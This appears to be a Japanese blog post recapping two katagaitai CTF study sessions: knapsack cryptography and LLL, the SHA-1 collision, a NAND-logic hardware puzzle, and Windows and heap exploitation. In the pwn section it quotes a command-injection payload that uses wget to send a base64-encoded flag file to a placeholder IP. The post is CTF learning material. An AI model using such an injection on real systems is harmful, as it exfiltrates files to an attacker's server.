katagaitai CTF勉強会#7 #8 - 関東|med に参加してきました
2日間の開催!大容量
脳が疲れたww
良い勉強会でございました。
katagaitai CTF勉強会 #7 - 関東|med : ATND
katagaitai CTF勉強会 #8 - 関東|med : ATND
trmrさんの部¶
ナップサック暗号!どういうものか解った!(解けるとは言っていない)
結論:MHナップサック暗号は、CTF的にいうと数パターンしかない。SageMathとか使って、LLLアルゴリズムでぶん殴れ!!!
あと、「(たぶん)日本で一番早いSHA-1衝突の勉強会」をしてくださいました。私が理解したポイントは・・・
- マークス・ティーブンスはハッシュ衝突界のガチの人
- 暗号屋さん的には予測の範囲内(前々回の勉強会でもtrmrさんが触れてた)
- MD5から13年も破られてない。似たような構造の割にけっこう持ったという印象らしい。
- GPU110個使って、1年間ぶん回して衝突させた(それでも、計算量は総当りよりは10万分の1で済んだ)
- クラウドに換算すると11万ドル程かかる
- Googleさんは、90日後に全てを明らかにすると言っている。さぁ、90日間のハッシュ衝突CTFの開催だ!
yskさんの部¶
2016年度のSECCON SECCON TOWERこと腕木通信の塔 しかり、ハードウェア系は「あ、こりゃダメだわ、完全に解けない領域に入ったわ」と思って、そっ閉じしてたんだけど、、
根気さえあれば解けるということが解った!!回路図を起こすのが、なんというか、すごいなコレ・・・
さすが、400点の価値はある。
神は最初にNANDを作り、それからORとかXORとかANDとかNOTとかいろいろ作った。
NANDの組み合わせで、全ての論理回路が実現できるという事を知ってれば、わりと解答に早く辿り着けるんだね。面白い問題だわ・・・
takさんの部¶
これ、とても良い資料でした。公開、期待しています!!
小さいバイナリながら、Pwnに必要な要素(bss領域のオーバーフローかーらーのー)が随所に仕込まれているので、これは大変勉強になる問題ですね!
ちょっと面白いバックコネクトの方法を紹介して頂きました。
CMD = ";wget http://999.999.999.999/\$(cat flag|base64);sleep 10;"
自前のWebサーバを持っていれば、404と共にフラグがアクセスログに記録される。CTFだとflagさえ読めればいいので、無理にシェルでバックコネクトしなくてもいいし、楽かも。
bataさんの部¶
怒涛の337ページ・・・っ!!5時間ほどぶっ続けで喋るbataさん・・・っ
PEとELFを比較して説明してくれていて、Windowsのセキュリティ機構を整理して説明していて、かつ、複雑なヒープの話を説明してかつ、exploitまで書いちゃおうという・・・すごい資料。すごい資料ヤバイ。
これだけで参考書一冊二冊の情報量を超えているので、脳が死にましたw
これはもー、あとからゆっくり拝読させて頂きます。だいぶWindowsとPEに詳しくなれたような気がしてきました。
Windowsのセキュリティ機構って、意外にしっかりしてました。今のWindowsなら、バッファオーバーフローの脆弱性をついてシェルを奪取するって、かなり難しいんじゃないかな。。少なくともLinuxよりも難しい気がします。
スライドの中にも各種ツールの紹介がありますが、昔、Windowsでマルウェアの挙動とかを調べるツールを教えて貰ったことがあるので、参考までにご紹介しておきます。
bataさんからも紹介してもらってましたが、特にAPI Monitorが、ものすごい便利そうです。
産学連携セミナー インシデントレスポンス概論 を受講してきました
頂き物¶
メモ帳もらったよ!!ありがたく使わせて頂きます。
余談
新ホワイトハッカ飴3000缶wwwww
待ってます。
コメント